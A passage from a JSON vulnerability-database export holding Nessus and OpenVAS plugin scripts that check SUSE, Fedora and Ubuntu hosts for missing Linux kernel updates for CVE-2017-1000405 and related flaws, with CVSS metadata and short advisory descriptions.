script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.90-92.50.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.90-92.50.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873857", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873857", "title": "Fedora Update for kernel FEDORA-2017-9ea11e444d", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9ea11e444d_kernel_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-9ea11e444d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873857\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:54:59 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-9ea11e444d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ALUMLCIZOR6UUC5NJKXPGIAXHBJR6NL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~202.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873860", "title": "Fedora Update for kernel FEDORA-2017-b0c1f44130", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_b0c1f44130_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-b0c1f44130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873860\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:57 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-b0c1f44130\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6LLKSHB3TZCA72UK4KDILWHY4Q4RTGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~302.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843394", "title": "Ubuntu Update for linux USN-3510-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3510_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3510-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843394\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:23 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3510-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3510-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3510-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic-lpae\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-lowlatency\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500mc\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-emb\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843393", "title": "Ubuntu Update for linux-azure USN-3511-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3511_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-azure USN-3511-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843393\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:17 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-azure USN-3511-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux-azure on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3511-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3511-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.11.0-1016-azure\", ver:\"4.11.0-1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.11.0.1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843396", "title": "Ubuntu Update for linux-hwe USN-3508-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3508-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843396\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:42 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3508-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3508-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Yonggang Guo discovered that a\n race condition existed in the driver subsystem in the Linux kernel. A local\n attacker could use this to possibly gain administrative privileges.\n (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", 